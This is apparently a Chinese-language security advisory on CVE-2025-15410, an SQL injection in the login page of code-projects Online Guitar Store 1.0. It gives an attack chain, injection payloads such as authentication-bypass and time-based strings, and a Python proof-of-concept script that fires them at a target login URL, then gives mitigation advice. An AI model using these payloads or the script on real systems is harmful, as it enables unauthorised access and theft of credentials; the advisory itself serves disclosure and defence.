CVE-2025-15410: code-projects Online Guitar Store 1.0 /login.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15410

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Guitar Store 1.0

漏洞概述

CVE-2025-15410是code-projects Online Guitar Store 1.0中发现的一个高危SQL注入漏洞。该漏洞存在于登录页面的/login.php文件中，攻击者可以通过构造恶意的L_email参数值来执行未授权的SQL查询。由于该漏洞位于用户认证流程中，攻击者无需获取任何有效凭证即可利用此漏洞进行攻击。漏洞的CVSS评分为7.3（高危），攻击向量为网络层面，无需特殊权限或用户交互即可发起攻击。成功利用此漏洞可能导致数据库敏感信息泄露、用户凭证窃取，甚至可能通过SQL注入进一步获取服务器权限。该漏洞的利用代码已公开，增加了被恶意利用的风险。

技术细节

该SQL注入漏洞源于/login.php文件中对用户输入的L_email参数缺乏充分的输入验证和参数化查询处理。攻击者可以在登录表单的邮箱字段中注入SQL语句片段，当应用程序将该输入拼接到SQL查询语句中时，恶意SQL代码将被数据库服务器执行。由于漏洞位于认证机制中，攻击者可能利用UNION SELECT、布尔盲注或时间盲注等技术来提取数据库中的敏感信息，包括用户表中的用户名和密码哈希值。在某些配置下，攻击者还可能利用SELECT INTO OUTFILE或os-exec等方法实现文件系统写入或远程代码执行。漏洞影响的是登录功能的未知处理逻辑，攻击者可通过自动化工具快速探测和利用此漏洞。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的技术栈，确认其运行code-projects Online Guitar Store 1.0

STEP 2

步骤2

访问/login.php登录页面，定位L_email输入字段

STEP 3

步骤3

构造恶意SQL注入载荷（如admin' OR '1'='1' --）注入到L_email参数

STEP 4

步骤4

发送恶意请求，绕过正常认证流程获取未授权访问

STEP 5

步骤5

利用UNION SELECT或盲注技术提取数据库中的用户凭证、敏感数据

STEP 6

步骤6

横向移动：使用窃取的凭证访问其他系统或进一步提权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-15410 PoC - SQL Injection in Online Guitar Store 1.0 /login.php # Target: code-projects Online Guitar Store 1.0 # Vulnerability: L_email parameter SQL Injection def exploit_sqli(target_url): """ SQL Injection PoC for CVE-2025-15410 Tests for boolean-based blind SQL injection """ # Normal request (should fail with invalid credentials) normal_data = { 'L_email': '[email protected]', 'L_password': 'wrongpassword' } # SQL Injection payloads to test payloads = [ "admin' OR '1'='1", "admin' OR '1'='1' --", "admin' OR '1'='1' #", "' OR '1'='1' --", "' OR '1'='1' #", "admin' UNION SELECT NULL--", "admin' AND SLEEP(5)--" ] print(f'[*] Target: {target_url}') print(f'[*] Testing SQL Injection vulnerability...') try: # Test normal request first response = requests.post(target_url, data=normal_data, timeout=10) print(f'[+] Normal request status: {response.status_code}') # Test injection payloads for payload in payloads: print(f'\n[*] Testing payload: {payload}') inject_data = { 'L_email': payload, 'L_password': 'anything' } response = requests.post(target_url, data=inject_data, timeout=10) # Check for signs of successful injection if 'login' not in response.text.lower() or response.status_code != 200: print(f'[+] Potential injection detected!') print(f'[+] Response length: {len(response.text)}') else: print(f'[-] No obvious injection response') except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://target.com/login.php') sys.exit(1) target = sys.argv[1] exploit_sqli(target)

影响范围

code-projects Online Guitar Store 1.0

防御指南

临时缓解措施

立即在/login.php文件中的L_email参数处理逻辑前添加输入验证，使用PDO或mysqli的预处理语句替代字符串拼接构建SQL查询。对所有用户输入进行白名单验证，过滤SQL关键字和特殊字符（如单引号、分号、双破折号等）。同时限制数据库账户权限，避免Web应用账户具有DBA或管理员权限。暂时可通过配置WAF规则阻止包含SQL注入特征的请求。建议尽快升级到厂商发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15410
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15410
3 Details https://www.cvedetails.com/cve/CVE-2025-15410/
4 VulDB https://vuldb.com/cve/CVE-2025-15410
5 Link https://code-projects.org/
6 Link https://github.com/jjjjj-zr/jjjjjzr19/issues/4
7 Link https://vuldb.com/?ctiid.339330
8 Link https://vuldb.com/?id.339330
9 Link https://vuldb.com/?submit.728394